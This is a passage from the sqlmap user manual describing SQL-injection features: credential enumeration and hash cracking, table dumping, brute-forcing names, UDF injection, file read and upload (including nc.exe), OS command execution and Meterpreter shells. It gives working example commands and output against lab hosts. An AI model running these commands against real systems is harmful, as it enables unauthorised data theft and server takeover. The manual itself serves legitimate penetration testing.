[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
|
|
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
|
|
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
|
|
database management system users password hashes:
|
|
[*] postgres [1]:
|
|
password hash: md5d7d880f96044b72d0bba108ace96d1e4
|
|
clear-text password: testpass
|
|
[*] testuser [1]:
|
|
password hash: md599e5ea7a6f7c3269995cba3927fd0093
|
|
clear-text password: testpass
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>Not only sqlmap enumerated the DBMS users and their passwords, but it also
|
|
recognized the hash format to be PostgreSQL, asked the user whether or not
|
|
to test the hashes against a dictionary file and identified the clear-text
|
|
password for the <CODE>postgres</CODE> user, which is usually a DBA along the
|
|
other user, <CODE>testuser</CODE>, password.</P>
|
|
|
|
<P>This feature has been implemented for all DBMS where it is possible to
|
|
enumerate users' password hashes, including Oracle and Microsoft SQL
|
|
Server pre and post 2005.</P>
|
|
|
|
<P>You can also provide the <CODE>-U</CODE> option to specify the specific user
|
|
who you want to enumerate and eventually crack the password hash(es).
|
|
If you provide <CODE>CU</CODE> as username it will consider it as an alias for
|
|
current user and will retrieve the password hash(es) for this user.</P>
|
|
|
|
|
|
<H3>List database management system users privileges</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-privileges</CODE> and <CODE>-U</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about the DBMS users, it is possible to enumerate the
|
|
privileges for each database management system user.
|
|
By the privileges, sqlmap will also show you which are database
|
|
administrators.</P>
|
|
|
|
<P>You can also provide the <CODE>-U</CODE> option to specify the user who you
|
|
want to enumerate the privileges.</P>
|
|
|
|
<P>If you provide <CODE>CU</CODE> as username it will consider it as an alias for
|
|
current user and will enumerate the privileges for this user.</P>
|
|
|
|
<P>On Microsoft SQL Server, this feature will display you whether or not each
|
|
user is a database administrator rather than the list of privileges for
|
|
all users.</P>
|
|
|
|
|
|
<H3>List database management system users roles</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-roles</CODE> and <CODE>-U</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about the DBMS users, it is possible to enumerate the
|
|
roles for each database management system user.</P>
|
|
|
|
<P>You can also provide the <CODE>-U</CODE> option to specify the user who you
|
|
want to enumerate the privileges.</P>
|
|
|
|
<P>If you provide <CODE>CU</CODE> as username it will consider it as an alias for
|
|
current user and will enumerate the privileges for this user.</P>
|
|
|
|
<P>This feature is only available when the DBMS is Oracle.</P>
|
|
|
|
|
|
<H3>List database management system's databases</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-dbs</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about available databases, it is possible to enumerate the
|
|
list of databases.</P>
|
|
|
|
|
|
<H3>Enumerate database's tables</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-tables</CODE>, <CODE>-D</CODE> and
|
|
<CODE>-</CODE><CODE>-exclude-sysdbs</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about databases' tables, it is possible to enumerate
|
|
the list of tables for a specific database management system's databases.</P>
|
|
|
|
<P>If you do not provide a specific database with switch <CODE>-D</CODE>, sqlmap
|
|
will enumerate the tables for all DBMS databases.</P>
|
|
|
|
<P>You can also provide the <CODE>-</CODE><CODE>-exclude-sysdbs</CODE> switch to
|
|
exclude all system databases.</P>
|
|
|
|
<P>Note that on Oracle you have to provide the <CODE>TABLESPACE_NAME</CODE>
|
|
instead of the database name.</P>
|
|
|
|
|
|
<H3>Enumerate database table columns</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-columns</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
|
|
|
|
<P>When the session user has read access to the system table containing
|
|
information about database's tables, it is possible to enumerate the list
|
|
of columns for a specific database table.
|
|
sqlmap also enumerates the data-type for each column.</P>
|
|
|
|
<P>This feature depends on the option <CODE>-T</CODE> to specify the table name
|
|
and optionally on <CODE>-D</CODE> to specify the database name. When the
|
|
database name is not specified, the current database name is used.
|
|
You can also provide the <CODE>-C</CODE> option to specify the table columns
|
|
name like the one you provided to be enumerated.</P>
|
|
|
|
<P>Example against a SQLite target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns \
|
|
-D testdb -T users -C name
|
|
[...]
|
|
Database: SQLite_masterdb
|
|
Table: users
|
|
[3 columns]
|
|
+---------+---------+
|
|
| Column | Type |
|
|
+---------+---------+
|
|
| id | INTEGER |
|
|
| name | TEXT |
|
|
| surname | TEXT |
|
|
+---------+---------+
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>Note that on PostgreSQL you have to provide <CODE>public</CODE> or the
|
|
name of a system database. That's because it is not possible to enumerate
|
|
other databases tables, only the tables under the schema that the web
|
|
application's user is connected to, which is always aliased by
|
|
<CODE>public</CODE>.</P>
|
|
|
|
|
|
<H3>Enumerate database management system schema</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-schema</CODE></P>
|
|
|
|
<P>TODO</P>
|
|
|
|
|
|
<H3>Retrieve number of entries for table(s)</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-count</CODE></P>
|
|
|
|
<P>TODO</P>
|
|
|
|
|
|
<H3>Dump database table entries</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
|
|
<CODE>-</CODE><CODE>-start</CODE>, <CODE>-</CODE><CODE>-stop</CODE>, <CODE>-</CODE><CODE>-first</CODE>
|
|
and <CODE>-</CODE><CODE>-last</CODE></P>
|
|
|
|
<P>When the session user has read access to a specific database's table it is
|
|
possible to dump the table entries.</P>
|
|
|
|
<P>This functionality depends on switch <CODE>-T</CODE> to specify the table
|
|
name and optionally on switch <CODE>-D</CODE> to specify the database name.
|
|
If the table name is provided, but the database name is not, the current
|
|
database name is used.</P>
|
|
|
|
<P>Example against a Firebird target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
|
[...]
|
|
Database: Firebird_masterdb
|
|
Table: USERS
|
|
[4 entries]
|
|
+----+--------+------------+
|
|
| ID | NAME | SURNAME |
|
|
+----+--------+------------+
|
|
| 1 | luther | blisset |
|
|
| 2 | fluffy | bunny |
|
|
| 3 | wu | ming |
|
|
| 4 | NULL | nameisnull |
|
|
+----+--------+------------+
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>This switch can also be used to dump all tables' entries of a provided
|
|
database. You simply have to provide sqlmap with the <CODE>-</CODE><CODE>-dump</CODE>
|
|
switch along with only the <CODE>-D</CODE> switch, no <CODE>-T</CODE> and no
|
|
<CODE>-C</CODE>.</P>
|
|
|
|
<P>You can also provide a comma-separated list of the specific columns to
|
|
dump with the <CODE>-C</CODE> switch.</P>
|
|
|
|
<P>sqlmap also generates for each table dumped the entries in a CSV format
|
|
textual file.
|
|
You can see the absolute path where sqlmap creates the file by providing a
|
|
verbosity level greater than or equal to <B>1</B>.</P>
|
|
|
|
<P>If you want to dump only a range of entries, then you can provide switches
|
|
<CODE>-</CODE><CODE>-start</CODE> and/or <CODE>-</CODE><CODE>-stop</CODE> to respectively
|
|
start to dump from a certain entry and stop the dump at a certain entry.
|
|
For instance, if you want to dump only the first entry, provide
|
|
<CODE>-</CODE><CODE>-stop 1</CODE> in your command line. Vice versa if, for
|
|
instance, you want to dump only the second and third entry, provide
|
|
<CODE>-</CODE><CODE>-start 1</CODE> <CODE>-</CODE><CODE>-stop 3</CODE>.</P>
|
|
|
|
<P>It is also possible to specify which single character or range of characters
|
|
to dump with switches <CODE>-</CODE><CODE>-first</CODE> and <CODE>-</CODE><CODE>-last</CODE>.
|
|
For instance, if you want to dump columns' entries from the third to the
|
|
fifth character, provide <CODE>-</CODE><CODE>-first 3</CODE> <CODE>-</CODE><CODE>-last
|
|
5</CODE>.
|
|
This feature only applies to the blind SQL injection techniques because for
|
|
error-based and UNION query SQL injection techniques the number of requests
|
|
is exactly the same, regardless of the length of the column's entry output
|
|
to dump.</P>
|
|
|
|
<P>As you may have noticed by now, sqlmap is <B>flexible</B>: you can leave
|
|
it to automatically dump the whole database table or you can be very
|
|
precise in which characters to dump, from which columns and which range of
|
|
entries.</P>
|
|
|
|
|
|
<H3>Dump all databases tables entries</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-dump-all</CODE> and <CODE>-</CODE><CODE>-exclude-sysdbs</CODE></P>
|
|
|
|
<P>It is possible to dump all databases tables entries at once that the
|
|
session user has read access on.</P>
|
|
|
|
<P>You can also provide the <CODE>-</CODE><CODE>-exclude-sysdbs</CODE> switch to
|
|
exclude all system databases. In that case sqlmap will only dump entries
|
|
of users' databases tables.</P>
|
|
|
|
<P>Note that on Microsoft SQL Server the <CODE>master</CODE> database is not
|
|
considered a system database because some database administrators use it
|
|
as a users' database.</P>
|
|
|
|
|
|
<H3>Search for columns, tables or databases</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-search</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE></P>
|
|
|
|
<P>This switch allows you to <B>search for specific database names, specific
|
|
tables across all databases or specific columns across all databases'
|
|
tables</B>.</P>
|
|
|
|
<P>This is useful, for instance, to identify tables containing custom
|
|
application credentials where relevant columns' names contain string like
|
|
<EM>name</EM> and <EM>pass</EM>.</P>
|
|
|
|
<P>The switch <CODE>-</CODE><CODE>-search</CODE> needs to be used in conjunction with
|
|
one of the following support switches:</P>
|
|
<P>
|
|
<UL>
|
|
<LI><CODE>-C</CODE> following a list of comma-separated column names to look
|
|
for across the whole database management system.</LI>
|
|
<LI><CODE>-T</CODE> following a list of comma-separated table names to look
|
|
for across the whole database management system.</LI>
|
|
<LI><CODE>-D</CODE> following a list of comma-separated database names to
|
|
look for across the database management system.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H3>Run custom SQL statement</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-sql-query</CODE> and <CODE>-</CODE><CODE>-sql-shell</CODE></P>
|
|
|
|
<P>The SQL query and the SQL shell features allow to run arbitrary SQL
|
|
statements on the database management system.
|
|
sqlmap automatically dissects the provided statement, determines which
|
|
technique is appropriate to use to inject it and how to pack the SQL
|
|
payload accordingly.</P>
|
|
|
|
<P>If the query is a <CODE>SELECT</CODE> statement, sqlmap will retrieve its
|
|
output.
|
|
Otherwise it will execute the query through the stacked query SQL
|
|
injection technique if the web application supports multiple statements on
|
|
the back-end database management system.
|
|
Beware that some web application technologies do not support stacked
|
|
queries on specific database management systems. For instance, PHP does
|
|
not support stacked queries when the back-end DBMS is MySQL, but it does
|
|
support when the back-end DBMS is PostgreSQL.</P>
|
|
|
|
<P>Examples against a Microsoft SQL Server 2000 target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
|
|
"SELECT 'foo'" -v 1
|
|
|
|
[...]
|
|
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
|
|
[hh:mm:14] [INFO] retrieved: foo
|
|
SELECT 'foo': 'foo'
|
|
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
|
|
"SELECT 'foo', 'bar'" -v 2
|
|
|
|
[...]
|
|
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
|
|
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
|
|
distinct queries to be able to retrieve the output even if we are going blind
|
|
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
|
|
(CHAR(32)))
|
|
[hh:mm:50] [INFO] retrieved: foo
|
|
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
|
|
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
|
|
(CHAR(32)))
|
|
[hh:mm:50] [INFO] retrieved: bar
|
|
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
|
|
SELECT 'foo', 'bar': 'foo, bar'
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>As you can see, sqlmap splits the provided query into two different
|
|
<CODE>SELECT</CODE> statements then retrieves the output for each separate
|
|
query.</P>
|
|
|
|
<P>If the provided query is a <CODE>SELECT</CODE> statement and contains a
|
|
<CODE>FROM</CODE> clause, sqlmap will ask you if such statement can return
|
|
multiple entries. In that case the tool knows how to unpack the query
|
|
correctly to count the number of possible entries and retrieve its output,
|
|
entry per entry.</P>
|
|
|
|
<P>The SQL shell option allows you to run your own SQL statement
|
|
interactively, like a SQL console connected to the database management
|
|
system.
|
|
This feature provides TAB completion and history support too.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Brute force</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to run brute force checks.</P>
|
|
|
|
<H3>Brute force tables names</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-common-tables</CODE></P>
|
|
|
|
<P>There are cases where <CODE>-</CODE>-<CODE>tables</CODE> switch can not be used to
|
|
retrieve the databases' table names. These cases usually fit into one
|
|
of the following categories:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>The database management system is MySQL <B>< 5.0</B> where
|
|
<CODE>information_schema</CODE> is not available.</LI>
|
|
<LI>The database management system is Microsoft Access and system table
|
|
<CODE>MSysObjects</CODE> is not readable - default setting.</LI>
|
|
<LI>The session user does not have read privileges against the system
|
|
table storing the scheme of the databases.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>If any of the first two cases apply and you provided the
|
|
<CODE>-</CODE>-<CODE>tables</CODE> switch, sqlmap will prompt you with a question
|
|
to fall back to this technique.
|
|
Either of these cases apply to your situation, sqlmap can possibly still
|
|
identify some existing tables if you provide it with the
|
|
<CODE>-</CODE><CODE>-common-tables</CODE> switch. sqlmap will perform a
|
|
brute-force attack in order to detect the existence of common tables
|
|
across the DBMS.</P>
|
|
|
|
<P>The list of common table names is <CODE>txt/common-tables.txt</CODE> and you
|
|
can edit it as you wish.</P>
|
|
|
|
<P>Example against a MySQL 4.1 target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" \
|
|
--common-tables -D testdb --banner
|
|
|
|
[...]
|
|
[hh:mm:39] [INFO] testing MySQL
|
|
[hh:mm:39] [INFO] confirming MySQL
|
|
[hh:mm:40] [INFO] the back-end DBMS is MySQL
|
|
[hh:mm:40] [INFO] fetching banner
|
|
web server operating system: Windows
|
|
web application technology: PHP 5.3.1, Apache 2.2.14
|
|
back-end DBMS operating system: Windows
|
|
back-end DBMS: MySQL < 5.0.0
|
|
banner: '4.1.21-community-nt'
|
|
|
|
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
|
|
[hh:mm:40] [INFO] adding words used on web page to the check list
|
|
please enter number of threads? [Enter for 1 (current)] 8
|
|
[hh:mm:43] [INFO] retrieved: users
|
|
|
|
Database: testdb
|
|
[1 table]
|
|
+-------+
|
|
| users |
|
|
+-------+
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H3>Brute force columns names</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-common-columns</CODE></P>
|
|
|
|
<P>As per tables, there are cases where <CODE>-</CODE>-<CODE>columns</CODE> switch
|
|
can not be used to retrieve the databases' tables' column names. These
|
|
cases usually fit into one of the following categories:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>The database management system is MySQL <B>< 5.0</B> where
|
|
<CODE>information_schema</CODE> is not available.</LI>
|
|
<LI>The database management system is Microsoft Access where this
|
|
kind of information is not available inside system tables.</LI>
|
|
<LI>The session user does not have read privileges against the system
|
|
table storing the scheme of the databases.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>If any of the first two cases apply and you provided the
|
|
<CODE>-</CODE>-<CODE>columns</CODE> switch, sqlmap will prompt you with a question
|
|
to fall back to this technique.
|
|
Either of these cases apply to your situation, sqlmap can possibly still
|
|
identify some existing tables if you provide it with the
|
|
<CODE>-</CODE><CODE>-common-columns</CODE> switch. sqlmap will perform a
|
|
brute-force attack in order to detect the existence of common columns
|
|
across the DBMS.</P>
|
|
|
|
<P>The list of common table names is <CODE>txt/common-columns.txt</CODE> and you
|
|
can edit it as you wish.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">User-defined function injection</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to create custom user-defined functions.</P>
|
|
|
|
<H3>Inject custom user-defined functions (UDF)</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-udf-inject</CODE> and <CODE>-</CODE><CODE>-shared-lib</CODE></P>
|
|
|
|
<P>You can inject your own user-defined functions (UDFs) by compiling a
|
|
MySQL or PostgreSQL shared library, DLL for Windows and shared object for
|
|
Linux/Unix, then provide sqlmap with the path where the shared library
|
|
is stored locally on your machine. sqlmap will then ask you some
|
|
questions, upload the shared library on the database server file system,
|
|
create the user-defined function(s) from it and, depending on your
|
|
options, execute them. When you are finished using the injected UDFs,
|
|
sqlmap can also remove them from the database for you.</P>
|
|
|
|
<P>These techniques are detailed in the white paper
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
|
|
|
|
<P>Use switch <CODE>-</CODE><CODE>-udf-inject</CODE> and follow the instructions.</P>
|
|
|
|
<P>If you want, you can specify the shared library local file system path
|
|
via command line too by using <CODE>-</CODE><CODE>-shared-lib</CODE> option. Vice
|
|
versa sqlmap will ask you for the path at runtime.</P>
|
|
|
|
<P>This feature is available only when the database management system is
|
|
MySQL or PostgreSQL.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">File system access</A>
|
|
</H2>
|
|
|
|
<H3>Read a file from the database server's file system</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-file-read</CODE></P>
|
|
|
|
<P>It is possible to retrieve the content of files from the underlying file
|
|
system when the back-end database management system is either MySQL,
|
|
PostgreSQL or Microsoft SQL Server, and the session user has the needed
|
|
privileges to abuse database specific functionalities and architectural
|
|
weaknesses.
|
|
The file specified can be either a textual or a binary file. sqlmap will
|
|
handle it properly.</P>
|
|
|
|
<P>These techniques are detailed in the white paper
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
|
|
|
|
<P>Example against a Microsoft SQL Server 2005 target to retrieve a binary
|
|
file:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
|
--file-read "C:/example.exe" -v 1
|
|
|
|
[...]
|
|
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
|
|
web server operating system: Windows 2000
|
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
|
|
back-end DBMS: Microsoft SQL Server 2005
|
|
|
|
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
|
|
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
|
|
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
|
|
[...]
|
|
|
|
$ ls -l output/192.168.136.129/files/C__example.exe
|
|
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
|
|
|
|
$ file output/192.168.136.129/files/C__example.exe
|
|
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
|
80386 32-bit
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H3>Upload a file to the database server's file system</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-file-write</CODE> and <CODE>-</CODE><CODE>-file-dest</CODE></P>
|
|
|
|
<P>It is possible to upload a local file to the database server's file system
|
|
when the back-end database management system is either MySQL, PostgreSQL
|
|
or Microsoft SQL Server, and the session user has the needed privileges to
|
|
abuse database specific functionalities and architectural weaknesses.
|
|
The file specified can be either a textual or a binary file. sqlmap will
|
|
handle it properly.</P>
|
|
|
|
<P>These techniques are detailed in the white paper
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
|
|
|
|
<P>Example against a MySQL target to upload a binary UPX-compressed file:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ file /software/nc.exe.packed
|
|
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
|
|
|
|
$ ls -l /software/nc.exe.packed
|
|
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
|
|
|
|
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
|
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
|
|
|
|
[...]
|
|
[hh:mm:29] [INFO] the back-end DBMS is MySQL
|
|
web server operating system: Windows 2003 or 2008
|
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
|
|
[...]
|
|
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
|
|
written on the back-end DBMS file system? [Y/n] y
|
|
[hh:mm:52] [INFO] retrieved: 31744
|
|
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
|
|
same size as the local file '/software/nc.exe.packed'
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="ss5.13">5.13</A> <A HREF="#toc5.13">Operating system takeover</A>
|
|
</H2>
|
|
|
|
<H3>Run arbitrary operating system command</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-os-cmd</CODE> and <CODE>-</CODE><CODE>-os-shell</CODE></P>
|
|
|
|
<P>It is possible to <B>run arbitrary commands on the database server's
|
|
underlying operating system</B> when the back-end database management
|
|
system is either MySQL, PostgreSQL or Microsoft SQL Server, and the
|
|
session user has the needed privileges to abuse database specific
|
|
functionalities and architectural weaknesses.</P>
|
|
|
|
<P>On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality
|
|
explained above) a shared library (binary file) containing two
|
|
user-defined functions, <CODE>sys_exec()</CODE> and <CODE>sys_eval()</CODE>, then
|
|
it creates these two functions on the database and calls one of them to
|
|
execute the specified command, depending on user's choice to display the
|
|
standard output or not.
|
|
On Microsoft SQL Server, sqlmap abuses the <CODE>xp_cmdshell</CODE> stored
|
|
procedure: if it is disabled (by default on Microsoft SQL Server >= 2005),
|
|
sqlmap re-enables it; if it does not exist, sqlmap creates it from
|
|
scratch.</P>
|
|
|
|
<P>When the user requests the standard output, sqlmap uses one of the
|
|
enumeration SQL injection techniques (blind, inband or error-based) to
|
|
retrieve it. Vice versa, if the standard output is not required, stacked
|
|
query SQL injection technique is used to execute the command.</P>
|
|
|
|
<P>These techniques are detailed in the white paper
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
|
|
|
|
<P>Example against a PostgreSQL target:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
|
|
--os-cmd id -v 1
|
|
|
|
[...]
|
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
|
back-end DBMS: PostgreSQL
|
|
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
|
|
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
|
|
[hh:mm:12] [INFO] testing if current user is DBA
|
|
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
|
|
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
|
|
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
|
|
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
|
|
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
|
|
do you want to retrieve the command standard output? [Y/n/a] y
|
|
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
|
|
|
|
[hh:mm:19] [INFO] cleaning up the database management system
|
|
do you want to remove UDF 'sys_eval'? [Y/n] y
|
|
do you want to remove UDF 'sys_exec'? [Y/n] y
|
|
[hh:mm:23] [INFO] database management system cleanup finished
|
|
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
|
|
only be deleted manually
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>It is also possible to simulate a real shell where you can type as many
|
|
arbitrary commands as you wish. The option is <CODE>-</CODE><CODE>-os-shell</CODE>
|
|
and has the same TAB completion and history functionalities that
|
|
<CODE>-</CODE><CODE>-sql-shell</CODE> has.</P>
|
|
|
|
<P>Where stacked queries has not been identified on the web application
|
|
(e.g. PHP or ASP with back-end database management system being MySQL) and
|
|
the DBMS is MySQL, it is still possible to abuse the <CODE>SELECT</CODE>
|
|
clause's <CODE>INTO OUTFILE</CODE> to create a web backdoor in a writable
|
|
folder within the web server document root and still get command
|
|
execution assuming the back-end DBMS and the web server are hosted on the
|
|
same server.
|
|
sqlmap supports this technique and allows the user to provide a
|
|
comma-separated list of possible document root sub-folders where try to
|
|
upload the web file stager and the subsequent web backdoor. Also, sqlmap
|
|
has its own tested web file stagers and backdoors for the following
|
|
languages:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>ASP</LI>
|
|
<LI>ASP.NET</LI>
|
|
<LI>JSP</LI>
|
|
<LI>PHP</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H3>Out-of-band stateful connection: Meterpreter & friends</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-os-pwn</CODE>, <CODE>-</CODE><CODE>-os-smbrelay</CODE>,
|
|
<CODE>-</CODE><CODE>-os-bof</CODE>, <CODE>-</CODE><CODE>-priv-esc</CODE>,
|
|
<CODE>-</CODE><CODE>-msf-path</CODE> and <CODE>-</CODE><CODE>-tmp-path</CODE></P>
|
|
|
|
<P>It is possible to establish an <B>out-of-band stateful TCP connection
|
|
between the attacker machine and the database server</B> underlying
|
|
operating system when the back-end database management system is either
|
|
MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the
|
|
needed privileges to abuse database specific functionalities and
|
|
architectural weaknesses.
|
|
This channel can be an interactive command prompt, a Meterpreter session
|
|
or a graphical user interface (VNC) session as per user's choice.</P>
|
|
|
|
<P>sqlmap relies on Metasploit to create the shellcode and implements four
|
|
different techniques to execute it on the database server. These
|
|
techniques are:
|
|
<UL>
|
|
<LI>Database <B>in-memory execution of the Metasploit's shellcode</B>
|
|
via sqlmap own user-defined function <CODE>sys_bineval()</CODE>. Supported on
|
|
MySQL and PostgreSQL - switch <CODE>-</CODE><CODE>-os-pwn</CODE>.</LI>
|
|
<LI>Upload and execution of a Metasploit's <B>stand-alone payload
|
|
stager</B> via sqlmap own user-defined function <CODE>sys_exec()</CODE> on
|
|
MySQL and PostgreSQL or via <CODE>xp_cmdshell()</CODE> on Microsoft SQL
|
|
Server - switch <CODE>-</CODE><CODE>-os-pwn</CODE>.</LI>
|
|
<LI>Execution of Metasploit's shellcode by performing a <B>SMB
|
|
reflection attack</B> (
|
|
<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx">MS08-068</A>) with a UNC path request from the database server to
|
|
the attacker's machine where the Metasploit <CODE>smb_relay</CODE> server
|
|
exploit listens. Supported when running sqlmap with high privileges
|
|
(<CODE>uid=0</CODE>) on Linux/Unix and the target DBMS runs as Administrator
|
|
on Windows - switch <CODE>-</CODE><CODE>-os-smbrelay</CODE>.</LI>
|
|
<LI>Database in-memory execution of the Metasploit's shellcode by
|
|
exploiting <B>Microsoft SQL Server 2000 and 2005
|
|
<CODE>sp_replwritetovarbin</CODE> stored procedure heap-based buffer
|
|
overflow</B> (
|
|
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx">MS09-004</A>). sqlmap has its own exploit to trigger the
|
|
vulnerability with automatic DEP memory protection bypass, but it relies
|
|
on Metasploit to generate the shellcode to get executed upon successful
|
|
exploitation - switch <CODE>-</CODE><CODE>-os-bof</CODE>.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>These techniques are detailed in the white paper
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A> and in the
|
|
